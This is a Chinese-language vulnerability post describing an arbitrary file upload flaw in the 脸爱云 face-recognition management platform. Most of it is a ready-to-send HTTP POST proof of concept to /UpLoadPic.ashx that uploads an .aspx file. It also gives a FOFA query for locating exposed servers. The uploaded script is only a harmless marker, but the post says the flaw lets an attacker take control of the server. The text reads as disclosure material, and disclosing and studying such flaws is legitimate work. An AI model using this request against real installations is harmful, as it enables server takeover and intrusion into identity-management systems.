当前位置: 首页 > news >正文

脸爱云管理系统存在任意文件上传漏洞

漏洞描述

脸爱云一脸通智慧管理平台是一套功能强大、运行稳定、操作简单方便、用户界面美观的一脸通系统。该平台整合了人脸识别技术和智能化解决方案,可以实现识别和管理个体身份,为各种场景提供便捷的身份验证和管理功能。其存在任意文件上传漏洞,攻击者可通过此漏洞上传文件,进而控制服务器。

漏洞复现

FOFA

title=="欢迎使用脸爱云 一脸通智慧管理平台"

POC

POST /UpLoadPic.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
X-Requested-With: XMLHttpRequest
Content-Length: 419Connection: close
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="action"post
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="myPhoto"; filename="1.aspx"
Content-Type: image/png<% response.write("yga") %>
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="oldName"------WebKitFormBoundarywt7cEu1eBdibB13u--

bp

访问文件查看 上传成功

http://www.lryc.cn/news/450352.html

相关文章:

  • elasticsearch_exporter启动报错 failed to fetch and decode node stats
  • Git 使用方法
  • 生产环境升级mysql流程及配置主从服务
  • 论软件体系结构的演化
  • 【go入门】常量
  • 2.1 HuggingFists系统架构(二)
  • 工具类:JWT
  • 王道-计网
  • 【机器学习(十)】时间序列案例之月销量预测分析—Holt-Winters算法—Sentosa_DSML社区版
  • Webpack优化问题
  • yjs10——pandas的基础操作
  • Squaretest单元测试辅助工具使用
  • MFU简介
  • 十分钟实现内网连接,配置frp
  • 解决MySQL命令行中出现乱码问题
  • TS系列(7):知识点汇总
  • Unity 查看Inspectors组件时严重掉帧
  • golang学习笔记23-面向对象(五):多态与断言【重要】
  • RabbitMQ基础知识
  • 基于Python大数据的音乐推荐及数据分析可视化系统
  • 安达发|太阳能设备行业APS计划排程软件能解决哪些问题
  • CaChe的基本原理
  • 数据结构-栈(理解版)
  • NAND Flash虚拟层初始化
  • zabbix7.0监控linux主机案例详解
  • 2024重生之回溯数据结构与算法系列学习(10)【无论是王道考研人还是IKUN都能包会的;不然别给我家鸽鸽丢脸好嘛?】
  • django drf 过滤器
  • 蓝桥杯—STM32G431RBT6(RTC时钟获取时间和日期)
  • DriveVLM 论文学习
  • Unity3D 客户端多开